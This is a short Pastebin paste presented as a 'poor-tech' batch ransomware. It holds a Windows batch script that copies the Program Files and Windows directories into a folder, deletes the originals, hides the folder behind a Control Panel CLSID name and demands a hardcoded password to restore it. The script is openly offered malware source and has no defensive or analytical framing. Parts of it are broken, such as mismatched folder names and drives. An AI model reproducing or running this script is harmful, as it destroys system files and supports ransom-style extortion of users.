FlyFar

A Poor-Tech Batch Ransomware with Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D} Standard Lock

Oct 22nd, 2021 (edited)
190
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.85 KB | None | 0 0
  1. @ECHO OFF
  2. color 02
  3. title CryptoFiles
  4. if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
  5. if NOT EXIST Locker goto MDCRYPTO
  6. goto LOCK
  7. :LOCK
  8. ren CrytoFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
  9. attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
  10. :UNLOCK
  11. echo Enter password to Unlock your files!
  12. set/p "pass=>"
  13. if NOT %pass%==1v0v2c8n4b6zsFrnFsnsnzsuGhwna103iu goto FAIL
  14. attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
  15. ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
  16. echo Your files unlocked succesful!
  17. goto End
  18. :FAIL
  19. echo Bye
  20. goto end
  21. :MDCRYPTO
  22. md CryptoFolder
  23. xcopy "C:\Program Files" "D:\CryptoFolder" /h /i /c /k /e /r /y
  24. del C:\Program Files
  25. xcopy "C:\Windows" "D:\CryptoFolder" /h /i /c /k /e /r /y
  26. del C:\Windows
  27. goto End
  28. :End
  29. pause
  30. exit
Add Comment
Please, Sign In to add comment